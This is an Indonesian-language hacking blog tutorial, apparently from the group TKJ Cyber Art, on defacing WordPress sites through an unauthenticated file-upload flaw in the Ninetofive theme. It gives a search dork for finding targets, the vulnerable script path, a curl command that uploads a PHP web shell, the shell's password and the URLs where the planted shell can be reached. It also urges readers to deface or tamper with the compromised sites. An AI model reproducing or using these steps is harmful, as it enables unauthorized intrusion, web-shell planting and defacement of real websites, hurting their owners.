Hello World; Pagi Fans, Please Say Hello Haters :*
yoeeh Gengs, Lanjut lagii Walking Blog :D , dah Lama nih gak Share Bug di Theme CMS WordPress. xixixhi, kali ini Nue akan Share Tutorial Deface dengan WordPress Theme Ninetofive Remote Exploit. iseng2 share eXploit lawas, kali aja masih
Lanjut intip tutorialnya ;*
Bahan:
CGI Shell ( touch me senpai :'v ) | ( touche me Senpai :'D )
Dork:
inurl:/wp-content/themes/ninetofive
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
eXploit: /wp-content/themes/ninetofive/scripts/doajaxfileupload.php
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/wp-content/themes/ninetofive/scripts/doajaxfileupload.php
3. Vulnerability ~ {"error":"No files were uploaded."}
Kurang Lebih sih gini wkwkw |
Seterah Lu, mau Upload di shell bekasan lu, atau cpanel lu :p |
6. Setelah di klik, masukin password nya, password nya adalah webr00t
Masukin password nya, Lalu Klik Enter |
8. Lalu upload shell kalian
9. Setelah diupload, tinggal kita eksekusi :D masukin perintah berikut dan Tekan enter :D
curl -v -F "qqfile=@namashellkalian.php" "target.coli/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
10. Jika berhasil akan seperti gambar dibawah ini :
Nanti akan muncul random shell |
12. Akses Shell:
target.coli/wp-content/uploads/tahun/bulan/shell.php
target.coli/wp-content/themes/ninetofive/scripts/uploads/shell.php
note: shell akses ada 2, cobaiin aja satu2 awkwakwka >.< , KALO BERHASIL YA NANTI MUNCUL SHELL LU DI WEB TARGET ;*
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked ~
Sekian dan semoga bermanfaat .. terimakasih
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked ~
Sekian dan semoga bermanfaat .. terimakasih
Source and thanks to: eitaro attacker
./Nuenomaru
Sukses adalah cara balas Dendam terbaik, utk orang2 yg memandang Lu Sebelah Mata |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
EmoticonEmoticon